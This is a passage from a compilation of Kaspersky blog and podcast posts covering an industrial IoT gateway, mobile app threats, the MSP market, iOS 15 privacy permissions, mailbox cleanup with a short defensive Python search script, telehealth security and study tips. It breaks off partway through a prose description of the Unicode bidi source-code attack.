    Enforcement of the rules of interaction between the agents, as well as switching of the gateway’s statuses, is handled by the KSS cybersecurity monitor. This isolated subsystem of KasperskyOS constantly monitors observance of the predefined security policies (what each component may do) and, as per the ‘default deny’ principle, blocks all forbidden actions. The main competitive advantage of KSS is that its security policies are easy to describe in a special language and to combine with various predefined cybersecurity models. If just one of the components of KISG 100 (for example, the receiver agent) turns out to be compromised, it can’t harm the rest of them, while the system operator is informed of the attack and can get to work dealing with it.

    So, you still with us? Then here comes the inevitable ‘wait, there is more!’…

    The tiny box can help provide additional digital services too. It allows industrial data to be safely integrated into ERP/CRM and assorted other enterprise business systems!

    Scenarios involving such services can vary greatly. For example, for our respected customer Chelpipe Group (a leading producer of steel pipes), we calculated the efficiency of a machine-tool that cuts pipe. Thanks to this predictive analysis, up to $7000 per month can be saved on outlays when choosing to buy such a tool (!). In fact, such integration provides simply endless possibilities.

    One more example: the St. Petersburg company LenPoligraphMash connected its industrial equipment to its 1C ERP system, and now – almost in real time – the ERP shows analytics on the performance of all operators, so it can pay them based on actual (not normative or averaged) downtime. The uniqueness of this approach and its scalability were confirmed by experts of the respected analytical agency Arc Advisory Group in its first cyberimmunity report.


    So, as you can see, this isn’t just any old box. It’s a perfectly ingenious magical one! Already, besides being on full combat duty at Chelpipe Group, KISG 100 is supplied together with the metals-processing machinery of StankoMashKomplex, successful pilot projects are up and running with Rostec and Gazprom Neft, and dozens of other pilots with large industrial organizations have begun. The device received a special award for outstanding tech achievement at the largest Chinese IT event, the Internet World Conference; at the Hannover Messe 2021 industrial exhibition, KISG 100 earned a place among the best innovative solutions; and just recently it took the top prize in the IoT Awards 2021 of the Internet of Things Association, beating many top-rated companies.

    In the future we’ll be expanding the range of such smart boxes. Already, KISG 100‘s ‘older brother’ – KISG 1000 – is being beta tested. In addition to being a gateway-guard, it is also an inspector: it not only collects, checks and distributes telemetry, it also transfers management commands to devices and protects against network attacks.

    Kaspersky IoT Secure Gateway 1000

    The takeaway: you needn’t be afraid of digital; you simply need to be able to cook it properly! And we’re here to help with that – with the best chefs and recipes.

    View the full article

  11. Mobile apps that handle confidential user information should run in a trusted environment — and we’re talking about more than just banking apps. Aside from money, cybercriminals also seek out loyalty program points, discount cards, cryptocurrency wallets, and more.

    The creators of such apps can never know how well protected a user’s device is or how prepared its user is for cyberthreats. Instead of simply hoping your customers use mobile security solutions, you can proactively build additional user-protection technologies into your app. Here are our top five reasons to do so.

    1. Malicious software

    An ever-present threat, malware may come from whatever source the user uses to install apps on their phone or tablet. Even using official app stores is no guarantee of safety.

    Attackers have become especially inventive in recent years, and modern spyware includes a range of advanced features. Depending on the variety, malware can intercept app notifications, text messages, PIN codes, and screen-lock patterns; steal 2FA codes for Google Authenticator and the like; and share what is happening on the victim’s screen in real time.

    Malware capable of overlaying app windows with its own warrants a separate mention. Such programs can, for example, copy the interface of your solution and add fake login fields for stealing credentials.

    2. Unknown Wi-Fi networks

    You cannot know which networks app users will connect to. Just about every café and mode of transportation now offers its own Wi-Fi network to all and sundry, and anyone on the same network can try to intercept the data exchange between your app and the server, thus gaining access to the customer’s account. In some cases, cybercriminals set up their own wireless networks and deliberately leave them open to lure in users.

    3. Remote access tools

    An entire class of programs exists for the purpose of gaining complete control over users’ devices. RATs, or Remote Access Tools, are not necessarily malware (although some are) and may be included with legitimate apps. However, they can give cybercriminals remote access to the device, including the ability to change security settings, read any information on the device, and even use any app — including yours.

    4. Browser vulnerabilities

    In many cases, mobile apps are based on elements of a regular Web browser, plus or minus various functions. With browser engine vulnerabilities found regularly, mobile app developers periodically need to update their solutions. In the space between a vulnerability’s discovery and its fix, however, cybercriminals can try to attack through browser vulnerabilities in your app.

    5. Phishing

    Cybercriminals include phishers, who send links to malicious sites by e-mail, messaging apps, and text messages. Of course, attackers can try to copy the website of any company, but if they happen to target your users, luring them to a website that looks like yours or sending messages that appear to come from your company, yours is the reputation that can get stained.

    Why user protection is in your interest — and how to ensure it

    Formally, the threats we’ve listed hurt end users, not the companies that provide apps — at least, directly. Dig just a bit deeper and application operator losses become very clear. After all, the more cyberincidents, the greater the load on technical support; and in complicated scenarios, cases can end up in court, where even if you are not guilty or culpable, defending yourself will nonetheless require significant amounts of money. In addition, even if you prove your case, you are likely to lose a client, or worse: In this age of social media, news of even one incident can spread quickly and cause serious damage to a company’s reputation. Playing it safe and ensuring protection of your customers in advance makes good sense.

    Our arsenal includes Kaspersky Mobile Security SDK for adding security features to any mobile app: an antivirus engine and technologies with access to Kaspersky cloud services for real-time information about the reputation of files, Web pages, and public Wi-Fi networks. You can learn more about Kaspersky Mobile Security SDK on the solution’s dedicated page.

    View the full article

    For the vast majority of companies, the global COVID-19 pandemic caused dramatic changes in working processes. But few sectors were affected quite as much as the MSP market. Businesses of all sizes faced the need to implement new solutions and services. Moreover, they needed to implement them quickly — often without the necessary resources or expertise. As a result, even those who previously preferred to rely solely on internal staff were forced to consider external assistance — that’s where managed service providers (MSPs) came in.

    MSP and MSSP market growth

    All this activity has led to an increase in demand and, as a result, growth in the MSP market. Security services were especially in demand: at the very beginning of the pandemic, after the outbreak of cyberattacks on remote-work services, it became obvious that companies needed to implement new security mechanisms to keep their newly distributed corporate infrastructure secure.

    According to our MSP market focus in 2021 research, 81% of MSPs report an increase in their customer base compared to 2019. Among MSSPs, this figure is even higher — 91%. Canalys analysts note the same trend. According to their forecasts, the results of 2021 will show continued growth of the MSP market — in Europe alone, they expect market volume to increase from $79 billion in 2020 to $92 billion in 2021.

    Expanding cybersecurity services portfolio

    More and more MSPs are expanding their portfolios with security services. Interestingly, the reason isn’t only increased demand from their clients, but also the development of MSPs’ own expertise in the security field.

    Worryingly, the growing role of MSPs has been noticed not only by market analysts, but also by cybercriminals. Criminals are increasingly targeting MSPs because doing so lets them carry out supply-chain attack scenarios: by compromising the provider’s infrastructure, they can gain access to the MSP’s clients, thus increasing their potential revenue.

    The most vivid example of such an attack is SolarWinds. In our MSP market focus in 2021 report, we dedicated a whole section to the lessons of this incident. According to Canalys research, attacks on MSPs forced almost two-thirds of market participants to revise their security processes and the technologies they invested in. By and large, companies now need to become their own MSSP in order to deliver services to their clients efficiently and securely.

    Canalys analysts also proposed ten steps an MSP should take toward more secure practices. Five relate to necessary process changes, while the other five require certain technological changes. From a process perspective, analysts believe providers need to:

    1. Prioritize the security elements of a portfolio
    2. Assume they are already under attack
    3. Stay up to date with the latest patches
    4. Proactively train employees and customers
    5. Audit all internal tools and service level agreements

    From a technological point of view, Canalys experts advise:

    1. Enforce MFA for all remote logins
    2. Always use secure network and system infrastructure
    3. Restrict admin access during remote logins
    4. Create least privilege access for resources
    5. Upgrade networking tools for hybrid working

    For the report on the results of the MSP market focus in 2021 study, please visit a page on our blog. The two parts of the Canalys report, “Building managed services for security” and “Being a ‘trusted advisor'”, are available here.

    View the full article

  13. Welcome to episode 230 of the Transatlantic Cable podcast. Ahmed and Jeff are unable to attend the taping this week because of travel commitments. Filling in is the ever-dependable Jag.

    To start, we look at an interesting story from Down Under, where an impending government policy would force social media companies to unmask online trolls. From there, we move on to a story about facial recognition for goats in China (yes, really).

    After that rather unusual bit of news, David chats with David Emm about the recent Kaspersky GReAT APT review. We then look at two stories from the BBC: the first about a cryptocurrency called JRR Token (no relation to J.R.R. Tolkien, according to the creators), and the second on proposed legislation in the UK to ban default passwords on smart devices. Smart thinking, I say.

    If you liked what you heard, please consider subscribing and sharing with your friends. For more information on the stories we covered, see the links below:

    View the full article

  14. With each version of iOS, we've seen developers try to protect user data better. However, the core principle remains unchanged: You, the user, get to decide what information to share with which apps. With that in mind, we've put together an in-depth review of app permissions in iOS 15 to help you decide which requests to allow and which to deny.

    Where to find iOS 15 app permission settings

    iOS 15 offers several ways to manage permissions. We’ll talk about each of the three methods separately.

    Managing permissions when you first launch an app

    Every app requests permission to access certain information the first time you launch it, and that’s the easiest time to choose what data to share with the app. But even if you accidentally press “Yes” instead of “No,” you can still change it later.

    Setting up all permissions for a specific app

    To see and set all permissions for a particular app at once, open the system settings and scroll down to see a list of installed applications. Select an app to see what permissions it has and revoke them if you need to.

    Setting specific permissions for different applications

    Go to Settings → Privacy. There you will find a long list of basic iOS 15 permissions. Tap each one to see which applications have requested it; you can revoke access for any of them at any time.

    Not all permissions are in the Privacy menu; you’ll need to go to other settings sections to configure some of them. For example, you can disable mobile data transfer for apps in the Mobile section, and permission to use the Internet in the background is configured in the Background App Refresh section.

    Now you know where to look for what. Next, we’ll go into more detail about all of iOS’s permissions.

    Location Services

    What it is: Permission to access your location. This permission isn’t just about GPS; apps can also navigate using mobile network base stations, Bluetooth, and the coordinates of Wi-Fi hotspots you are connected to. Access to location services is used, for example, by maps to plot routes and show you nearby businesses.

    What the risks are: Having location access enables apps to map your movements accurately. App developers can use that data for marketing purposes, and cybercriminals can use it to spy on you.

    You may not want to give this permission to an app if you don’t fully trust it or don’t think it needs that level of information. For example, social networks can do without location access if you don’t add geotags to your posts or if you prefer to do so manually.

    If an app genuinely needs location access to work properly, here are two ways to protect yourself from being tracked:

    • Allow access to location only while using the app to give the app access to your coordinates only when you are actually using it. If the app wants to receive location information in the background, you will be notified and may opt out.
    • Turn off Precise Location to restrict the app’s knowledge of your location. In this case, the margin of error will be about 25 square kilometers (or 10 square miles) — that’s comparable to the area of a small city.

    What’s more, iOS has long had an indicator that lets you know that an app is requesting access to your location. With iOS 15, that indicator has become much more prominent, appearing as a bright blue icon with a white arrow at the top of the screen.

    When an app is accessing your location, iOS 15 shows a bright blue icon with a white arrow inside

    Where to configure it: Settings → Privacy → Location Services

    Tracking

    What it is: Permission to access a unique device identifier — the Identifier for Advertisers, or IDFA. Of course, each individual application can track a user’s actions in its own “territory.” But access to IDFA allows data matching across apps to form a much more detailed “digital portrait” of the user.

    So, for example, if you allow tracking in all applications, then a social network can not only see all of your records and profile information in it, but also find out what games you play, what music you listen to, the weather in cities you are interested in, what movies you watch, and much more.

    What the risks are: Tracking activity in apps enables the compilation of a much more extensive dossier on the phone’s owner, which increases advertising efficacy. In other words, it can encourage you to spend more money.

    Starting in iOS 14.5, users gained the ability to disable tracking requests in apps.

    Where to configure it: Settings → Privacy → Tracking

    Contacts

    What it is: Permission to access your address book — to read and change existing contacts and to add new contacts. Data an app can get with this permission includes not only names, phone numbers, and e-mail addresses, but also other information from your list of contacts, including notes about specific contacts (although apps need separate approval from Apple to access the notes).

    What the risks are: Databases of contacts — with numbers, addresses, and other information — can, for example, be used to attack an organization, send spam, or conduct phone scams.

    Where to configure it: Settings → Privacy → Contacts

    Calendars

    What it is: Permission to view, change, and add calendar events.

    What the risks are: The app will receive all of your personal calendar information, including past and scheduled events. That may include doctor’s appointments, meeting topics, and other information you don’t want to share with outsiders.

    Where to configure it: Settings → Privacy → Calendars

    Reminders

    What it is: Permission to read and change existing reminders and add new ones.

    What the risks are: If you have something personal recorded in your Reminders app, such as health data or information about family members, you may not want to share it with any app developers.

    Where to configure it: Settings → Privacy → Reminders

    Photos

    What it is: This permission allows the app to view, add, and delete photos and videos in your phone’s gallery. The app also can read photo metadata, such as information about where and when a photo was taken. Apps that need access to Photos include image editors and social networks.

    What the risks are: A personal photo gallery can say a lot about a person, from who their friends are and what they're interested in to where they go, and when. In general, even if your gallery contains no nude photos, pictures of both sides of your credit card, or screenshots with passwords, you should be cautious about giving apps access to it.

    Starting with iOS 14, Apple added the ability to give an app access to individual photos rather than the entire gallery. For example, if you want to post something on Instagram, you can choose precisely which images to share and keep your other photos invisible to the social network. In our opinion, that's the best way to provide access to your images.

    Where to configure it: Settings → Privacy → Photos

    Local Network

    What it is: Permission to connect to other devices on your local network, for example, to play music with AirPlay, or to control your router or other gadgets.

    What the risks are: With this type of access, applications can collect information about all of the devices on your local network. Data about your equipment can help an attacker find vulnerabilities, hack your router, and more.

    Where to configure it: Settings → Privacy → Local Network

    Nearby Interaction

    What it is: Permission to use Ultra Wideband (UWB), which the iPhone 11 and later support. Using UWB lets you measure the exact distance between your iPhone and other devices that support the technology. In particular, it’s used in Apple AirTag to find things you’ve tagged.

    What the risks are: A malicious app with UWB access can determine your location extremely accurately, to an exact room in a house or even more precisely.

    Where to configure it: Settings → Privacy → Nearby Interaction

    Microphone

    What it is: Permission to access your microphone.

    What the risks are: With this permission, the app can record all conversations near the iPhone, such as in business meetings or at a medical appointment.

    An orange dot in the upper right corner of the screen indicates when an app is using a microphone (the dot becomes red when you turn on the Increase Contrast accessibility feature).

    When an app is using the microphone, iOS 15 shows an orange dot

    Where to configure it: Settings → Privacy → Microphone

    Speech Recognition

    What it is: Permission to send voice-command recordings to Apple’s servers for recognition. An app needs this permission only if it uses Apple’s speech recognition service. If the app uses a third-party library for the same purpose, it will need another permission (Microphone) instead.

    What the risks are: By and large, asking for this permission is indicative of an app developer’s honest intentions — by using Apple’s proprietary speech recognition service, they are following the company’s rules and recommendations. A malicious app is much more likely to ask for direct access to the microphone. Nevertheless, use caution granting permission for speech recognition.

    Where to configure it: Settings → Privacy → Speech Recognition

    Camera

    What it is: Permission to take photos and videos, and to obtain metadata such as location and time.

    What the risks are: An application can connect to the phone’s cameras at any time, even without your knowledge, and obtain access to photos’ metadata (the time and location where they were taken). Attackers can use this permission to spy on you.

    If an application is currently accessing the camera, a green dot lights up in the upper right corner of the screen.

    When an app is using the camera, iOS 15 shows a green dot

    Where to configure it: Settings → Privacy → Camera

    Health

    What it is: Permission to access data you keep in the Health app, such as height, weight, age, and disease symptoms.

    What the risks are: App developers may sell your health information to advertisers or insurance companies, which can tailor ads based on that data or use it to calculate health insurance rates.

    Where to configure it: Settings → Privacy → Health

    Research Sensor & Usage Data

    What it is: Access to data from the phone's built-in sensors, such as the light sensor, accelerometer, and gyroscope. Judging by indirect references in this document, that could also include data from the microphone and facial recognition sensor, as well as from Apple Watch sensors. The permission can also provide access to data about keyboard usage, the number of messages sent, incoming and outgoing calls, categories of apps used, websites visited, and more.

    As you can see, this permission can provide a range of sensitive data about the device’s owner. Therefore, only apps designed for health and lifestyle research should request it.

    What the risks are: The permission can allow outsiders to obtain information about you that is not available to ordinary apps. In particular, this data allows examination of your walking pattern and the position of your head while you're looking at the screen, and makes it possible to collect a lot of information about how you use your device.

    Of course, you shouldn’t provide that much data about yourself to just anyone. Before agreeing to participate in a study and providing permission to the app in question, take a good look at what data the scientists are interested in, and how they plan to use it.

    Where to configure it: Settings → Privacy → Research Sensor & Usage Data

    HomeKit

    What it is: The ability to control smart home devices.

    What the risks are: With this level of access, an app can control smart home devices on your local network. For example, it can open smart door locks and blinds, turn music on and off, and control lights and security cameras. A random photo-filter app (for example) should not need this permission.

    Where to configure it: Settings → Privacy → HomeKit

    Media & Apple Music

    What it is: Permission to access your media library in Apple Music and iCloud. Apps will receive information about your playlists and personal recommendations, and they will be able to play, add, and delete tracks from your music library.

    What the risks are: If you don’t mind sharing your music preferences with the app, you probably have nothing to worry about, but be aware that this data may also be used for advertising purposes.

    Where to configure it: Settings → Privacy → Media & Apple Music

    Files and Folders

    What it is: Permission to access documents stored in the Files app.

    What the risks are: Apps can change, delete, or even steal important documents stored in the Files app. If you're using Files to store important data, keep access limited to the apps you truly trust.

    Where to configure it: Settings → Privacy → Files and Folders

    Motion & Fitness

    What it is: Permission to access data about your workouts and daily physical activity, such as number of steps taken, calories burned, and so on.

    What the risks are: Just like medical data from the Health app, activity data may be used by marketers to display targeted ads and by insurance companies to calculate health insurance costs.

    Where to configure it: Settings → Privacy → Motion & Fitness

    Focus

    What it is: This permission allows apps to see if notifications on your smartphone are currently muted or enabled.

    What the risks are: None.

    Where to configure it: Settings → Privacy → Focus

    Analytics & Improvements

    What it is: Permission to collect and send data to Apple about how you use your device. It includes, for example, information about the country you live in and the apps you run. Apple uses the information to improve the operating system.

    What the risks are: Your smartphone may use mobile data to send Apple data, potentially draining both the battery and your data plan a bit faster.

    Where to configure it: Settings → Privacy → Analytics & Improvements

    Apple Advertising

    What it is: Permission to collect personal information such as your name, address, age, gender, and more, and use it to show targeted ads from Apple’s ad service — but not to share it with other companies. Disabling this permission will not eliminate ads, but without data collection they will be generic, not targeted.

    What the risks are: As with any targeted ads, more effective advertising may lead to extra spending.

    Where to configure it: Settings → Privacy → Apple Advertising

    Record App Activity

    What it is: Permission to keep track of what data (location, microphone, camera, etc.) any given application accessed. At the time of this writing (using iOS 15.1), users may download the collected data as a file, albeit not a very informative one. Future versions of iOS (starting with 15.2, expected at the end of 2021) will use this data for the App Privacy Report, which is a bit like Screen Time, but for app tracking.

    What’s useful: If you want to use the App Privacy Report as soon as iOS 15.2 becomes available, you may want to enable app activity logging in advance.

    Where to configure it: Settings → Privacy → Record App Activity

    Mobile Data

    What it is: Permission to use mobile Internet. Applications need access to the Web to send messages, load photos and news feeds, and complete technical tasks such as sending bug reports.

    What the risks are: Apps working in the background can quickly deplete data allowances. Users may prefer to deny mobile Internet access to apps that send a lot of data over the Web, instead limiting them to Wi-Fi use, especially when roaming. We strongly recommend users go through their app lists and disable unnecessary mobile data permissions before trips abroad.

    Where to configure it: Settings → Mobile

    Background App Refresh

    What it is: Permission to refresh content when you are not using an app, that is, when it’s running in the background.

    What the risks are: Updating content consumes data and battery power, but all modern smartphones are designed to run apps in the background. Take action only if you notice that a certain program is sending a lot of data over the Web and significantly reducing your smartphone’s runtime. You can check apps’ mobile data and power consumption in the system settings, under Mobile Data and Battery.

    Where to configure it: Settings → General → Background App Refresh

    Better safe than sorry

    Protecting yourself from apps that are too greedy in collecting your personal information takes very little time. We strongly recommend taking that time, though, carefully considering all requests and being judicious about what you share and with whom. Remember that you are responsible for your privacy, so you can rest easy after denying any requests that seem suspicious or unreasonable, knowing your photos, videos, documents, and other data are safe.

    View the full article

  15. If someone gets access to your mailbox, one possible consequence is a BEC (business e-mail compromise) attack, and your stored correspondence can contribute greatly to its success. Of course, security software helps adjust the odds in your favor, but anyone can fall for phishing, so it's important to minimize the potential damage by removing any messages you would not want to fall into someone else's hands, just in case. Here is what to remove first.

    Authentication data

    Most modern services avoid sending even temporary passwords, instead providing unique links to a password-change interface. Sending passwords through unencrypted e-mail is a terrible idea, after all. But some companies do still send passwords by e-mail, and the practice is somewhat more common with internal services and resources. Moreover, employees sometimes send themselves passwords, logins, and their answers to secret questions.

    Such messages are exactly what attackers are looking for: with access to corporate resources, they can gather extra information for social engineering and develop the attack further.

    Online service notifications

    We get all sorts of notifications from online services: registration confirmations, password reset links, privacy policy update notifications. The messages themselves are of no interest to anybody, but they reveal which services you use, and attackers will most likely have scripts ready to automate their search for these notifications.

    In most cases your mailbox is the master key to all of these services. Knowing which ones you use, the attackers can request a password change and get in through your mailbox.

    Scans of personal documents

    Corporate users (particularly those in small business) are often tempted to use their mailboxes as a sort of cloud file storage, especially if the office scanner delivers scans by e-mail. Copies of passports, taxpayer IDs, and other documents are often required for routine paperwork or business trips.

    We recommend deleting any messages containing personal information immediately. Download the documents and keep them in encrypted storage.

    Sensitive business documents

    For many employees, document exchange is an integral part of business workflow. That said, some documents may be of value not only for your colleagues, but also for attackers.

    Take, for example, a financial report. Likely to be found in an accountant's mailbox, a financial report provides a wealth of powerful information and an ideal starting point for BEC attacks. Instead of sending scattershot scam letters to colleagues, cybercriminals armed with such information can use real details about specific contractors, accounts, and transaction amounts to craft convincing messages. They can also learn useful information about the company's business context, partners, and contractors so as to attack them as well. In some cases, careful study of a financial report may also present an opportunity for stock exchange manipulation.

    Therefore, it is important to delete sensitive information on receipt and never to exchange it unencrypted.

    Personal data

    Other people’s personal data, such as resumes and CVs, application and registration documents, and so forth, can find their way into your mailbox, too. When people give your company permission to store and process their personal data, they expect you to keep that information safe and secure. Regulators expect that as well, especially in countries with strict PII laws.

    How to secure yourself against a mailbox compromise

    We recommend deleting any information that may be of interest to attackers, not only from your inbox but also from your Sent and Deleted folders. If your business requires you to send commercially sensitive information by e-mail, use encryption, which most business e-mail clients support.
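
    If years of correspondence have piled up, finding such messages manually can be tedious. Below is a minimal Python sketch, using only the standard imaplib module, that lists messages mentioning the word "password" so you can review and delete them. The server, account, and folder names are placeholders for illustration; real folder names vary by provider.

        import imaplib

        HOST = "imap.example.com"        # placeholder server
        USER = "user@example.com"        # placeholder account
        APP_PASSWORD = "app-password"    # use an app password; never hard-code real credentials

        with imaplib.IMAP4_SSL(HOST) as imap:
            imap.login(USER, APP_PASSWORD)
            for folder in ("INBOX", "Sent", "Trash"):        # folder names vary by provider
                status, _ = imap.select(folder, readonly=True)
                if status != "OK":
                    continue
                # Ask the server for messages whose text contains the keyword
                status, data = imap.search(None, '(TEXT "password")')
                if status == "OK" and data and data[0]:
                    ids = data[0].split()
                    print(f"{folder}: {len(ids)} message(s) mention 'password'")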

    Additionally, we recommend using two-factor authentication wherever possible. If you do, then even if an attacker compromises your mailbox, your other accounts won’t end up in their hands.

    Store passwords and scanned documents in specialized applications such as our Password Manager.

    Practice prevention by keeping your mailbox secure, carefully screening your incoming mail at the mail server level and, as an additional layer of protection, using reliable security solutions on corporate computers.

    View the full article

  16. Welcome to the 229th episode of the Kaspersky Transatlantic Cable podcast. Ahmed, Dave and I start by looking into the world of NFTs.

    💀OMG WHO RIGHT CLICKED ALL OF THE #NFTs?☠️
    🛳🏴‍☠️ https://t.co/o0YRK78AkL 🏴‍☠️🛳
    👀 pic.twitter.com/g74TFqzX0n

    🏴‍☠️ thenftbay.org 👋🇵🇹 (@GeoffreyHuntley) November 18, 2021

    In this tale, it seems that a pirate site will allow users to download any NFT that has ever been bought or sold. Please tell me again how an NFT site can be fooled by a simple Ctrl + right click? From there, we dive into the Metaverse, where Facebook is rolling out its clone of the Oasis.

    Now, while they say that the haptic gloves will help make digital handshakes and eliminate business travel, we all know what they are really about… data. For our third story, we discuss how a glitch at Tesla locked some folks out of their autos.

    After the Tesla snafu, we jump to an odd story in the US. While there is plenty of weird going on in the US on any given day, this story looks at a woman who tried to hire a hitman to kill her ex-husband. Fortunately for him, and unfortunately for her, she used a fake site that then shared her info with the authorities. Now, as a PSA, please check out the site; it is quite comical, and you have to wonder about anyone who would think it's legitimate. We close out the pod by looking at a warning from the FBI about potential ransomware attacks tied to the US Thanksgiving holiday, as well as some tips for staying safe while shopping online.

    If you liked what you heard, please consider subscribing and sharing with your friends. For more information on the stories we covered, see the links below:

    View the full article

  17. Telehealth promises many benefits: remote 24-hour monitoring of the patient’s vital signs; the ability to get expert opinions even in the most remote regions; and considerable savings of time and resources into the bargain. In theory, the modern level of technology makes all this possible right now. In practice, however, telehealth still faces certain difficulties.

    Our colleagues, assisted by Arlington Research, interviewed representatives of large medical companies around the globe about the application of telehealth practices. The questions probed their views on the development of this field and, above all, the difficulties that doctors face when providing medical services remotely. Here is what they found.

    Patient data leaks

    According to 30% of those surveyed, patient data at their clinics had been compromised as a result of telehealth sessions. In today's climate of strictly regulated PII protection, leaks can cause serious problems for medical institutions in terms of both reputational damage and fines from regulators.

    How to fix it? Before adopting a new IT-based process, it makes sense to carry out an external audit to identify and remediate security and privacy flaws.

    Lack of data protection understanding

    42% of respondents admitted that medical employees taking part in telehealth sessions do not have a clear understanding of the data protection processes practiced in their clinic. This is undoubtedly bad. The doctor (a) might make a mistake that leads to a leak and (b) will be unable to answer (increasingly common) questions from the patient.

    How to fix it? First, the medical institution needs to produce a document that clearly spells out how data is stored and processed, and send it to all employees. Second, doctors should be more aware of modern cyberthreats. This will minimize the chance of error.

    Unsuitable software

    54% of respondents said their institutions provide telehealth services using software not designed for this purpose. Again, this can cause leaks simply due to the technical limitations of the software platforms used or unpatched vulnerabilities contained inside them.

    How to fix it? Wherever possible, use software designed specifically for medical purposes. Conduct a security audit of all applications used to provide remote services.

    Diagnostic errors due to technical limitations

    34% of organizations had experienced cases of misdiagnosis due to poor photo or video quality. This issue is partly a consequence of the previous one: video-conferencing software often automatically reduces image quality to ensure a seamless session. But problems can also arise due to congested servers or communication channels.

    How to fix it? Unfortunately, not everything here depends on the medical company — the root of the problem may lie in low-quality client-side equipment. All the same, the company should do all it can to minimize potential complications by providing backup capacity (if on-prem servers are used for teleconferencing) and a spare communication channel.

    Legacy operating systems

    73% of telehealth companies use equipment based on legacy operating systems. In some cases, this is for compatibility requirements, but it can also be due to upgrade costs or the simple lack of qualified IT staff. A vulnerable legacy system in the network can potentially serve as an entry point for attackers and be used both to steal patient data and to sabotage telehealth processes.

    How to fix it? It goes without saying that operating systems should be updated whenever possible. However, this is not always feasible, for example, when using outdated medical equipment. In such cases, we recommend isolating vulnerable systems in a separate network segment without Internet access and fitting them with specialized security solutions operating in Default Deny mode.

    More details about the Telehealth Take-up: Risks and Opportunities report are available here.

    View the full article

  18. Remote work and distance learning have been part of our reality since the spring of 2020, and they seem to be here to stay. College students enrolled after 2019 missed a huge part of the experience. But along with the obvious shortcomings, distance learning offers benefits that are no less significant: more sleep, better diet, and the ability to mix work and study more efficiently. Here is how to leverage the pros of distance education while smoothing over the cons.

    1. Set clear boundaries

    The first thing everyone I know was excited about when school went remote was being able to work and study without getting out of bed. Among other things, early-morning classes became manageable. That illusion vaporized fairly quickly, though.

    The whole concept of learning without having to get out of bed proved a bit less amazing in practice than I’d expected. After a few weeks of taking advantage of the relaxed atmosphere, I found I’d erased the boundary between study and leisure, and I started waking up at night, thinking about an impending deadline.

    We all need the right environments for our various activities. For learning, I strongly recommend creating the space you need to focus, listen, converse, read, and work. If you’re going to be studying or working at home, draw a clear line between learning and leisure spaces and keep your activities in the appropriate areas.

    Keeping up customary rituals from the old normal can help as well: Get up on time, change into appropriate clothes, brush hair, have breakfast, and so on — essentially, do what you’d be doing if you were going to school in person.

    2. Sleep and eat

    In making the transition to online learning, it’s easy to go to one extreme or the other. My problem was overfocusing on studies, but examples of the opposite abound as well, with classes taking a back seat to social networks, TV shows, and mobile games. Strange as it may seem, the same set of tips can help with both.

    First, work on your sleep schedule. In traditional learning environments, we spend a lot of time commuting and getting ready, but remote learning largely eliminates that. The newly available time might be better spent getting enough sleep.

    Another important step is evaluating and improving eating habits. For example, you may want to ensure you have breakfast, lunch, and dinner at the same time every day, or spend a bit more time preparing healthier meals. With distance learning, you can eat when you need to, not just when class schedules dictate, freeing you to spend less on meals and eat better at the same time.

    Neglecting leisure is not a good idea, either. Deadlines and home assignments will never end, but everyone needs room for friends, movies, and TV shows, and just plain recreation. Breaks help us learn more productively and gain fresh perspectives on old problems.

    3. Don’t forget to move

    Being active is absolutely essential to good health. If you have to spend most of your time sitting at home, try to find even 20 or 30 minutes to move around between or after classes. It will make a world of difference in the quality of your life.

    Consider an app, if that seems useful for you. Look for workout or other activity plans that are realistic but challenging, with a variety that appeals to you — with equipment or without; functional, cardiovascular, yoga, sports; slow, fast, intense, or gentle. Getting outdoors in between classes doesn’t hurt, either.

    4. Prepare for video calls

    Distance education has forced all students and educators into a new world of Zoom, Teams, Skype, Discord, and many other online communication tools. We probably should all have the hang of it by now, but well over a year into the pandemic, there’s still no end to the funny and embarrassing incidents.

    Case in point: this past September, my whole class was keenly aware that a classmate's friend had hit his first million views on TikTok. Always check that your microphone is muted and your camera is off!

    5. Don’t put off lectures for later

    Teachers often record their online lectures and share the recordings, which makes skipping class tempting. I just can’t recommend that. Keep the option for when you really cannot attend, but strive to follow a schedule; it’ll help you stay organized and focused — and let’s be honest, how often do you actually watch those recordings?

    6. Set notifications and remember your passwords

    Speaking of things that do not belong on the back burner, it is especially important to put deadlines on your calendar, or else they can sneak up on you. Helpful tools include Google Calendar, Google Keep, Todoist, TickTick, and the good old paper calendar.

    Notifications can save you if you have forgotten about the deadline for submitting a course paper or an important home assignment. To keep messages from course chats and school calendars or e-mail alerts from getting buried under junk, configure your notifications properly. Here are a few how-to articles:

    Distance learning has made each of us create about a thousand accounts with various services, and remembering all of your passwords is no small feat. So, if you do not have a password manager yet, now's the time to start using one.

    7. Learn to manage background noise

    Humanity’s engineering achievements can help to address some of the challenges online learning presents. You can always ask those around you to keep it down, but keeping the peace may require technological solutions.

    Noise-suppression apps can keep the people you talk with from hearing excessive background noise, but what about your concentration? You have a few options for keeping your study space calm and quiet, not all of which involve actually shushing the neighbors.

    8. Upgrade your hardware

    Learning from home is more likely than not to require some equipment upgrades. If you have been delaying getting that powerful laptop or a second monitor, now may be the time.

    Cash-strapped students may not be able to buy expensive devices, and it may make sense to cover at least some of your needs with old gadgets. For example, an old tablet could become a second screen, and a smartphone makes a good webcam. Wi-Fi routers need special attention as well; they're sure to see extra work.

    Carpe diem!

    Distance learning may have prevented us from enjoying part of the traditional student experience, but it can also uncover a wealth of new possibilities — and don’t forget, the pandemic will be over one day, whereas the skills you develop during this time are yours for life.

    View the full article

  19. University of Cambridge experts described a vulnerability they say affects most modern compilers. A novel attack method uses a legitimate feature of development tools whereby the source code displays one thing but compiles something completely different. It happens through the magic of Unicode control characters.

    Unicode directionality formatting characters relevant to reordering attacks. Source.

    Most of the time, control characters do not appear on the screen with the rest of the code (although some editors display them), but they modify the text in some way. This table contains the codes for the Unicode Bidirectional (bidi) Algorithm, for example.

    As you probably know, some human languages are written from left to right (e.g., English), others from right to left (e.g., Arabic). When code contains only one language, there’s no problem, but when necessary — when, for example, one line contains words in English and in Arabic — bidi codes specify text direction.

    In the authors’ work, they used such codes to, for example, move the comment terminator in Python code from the middle of a line to the end. They applied an RLI code to shift just a few characters, leaving the rest unaffected.

    Example of vulnerable Python code using bidi codes. Source.

    On the right is the version programmers see when checking the source code; the left shows how the code will be executed. Most compilers ignore control characters. Anyone checking the code will think the fifth line is a harmless comment, although in fact, an early-return statement hidden inside will cause the program to skip the operation that debits bank account funds. In this example, in other words, the simulated banking program will dispense money but not reduce the account balance.

    Why is it dangerous?

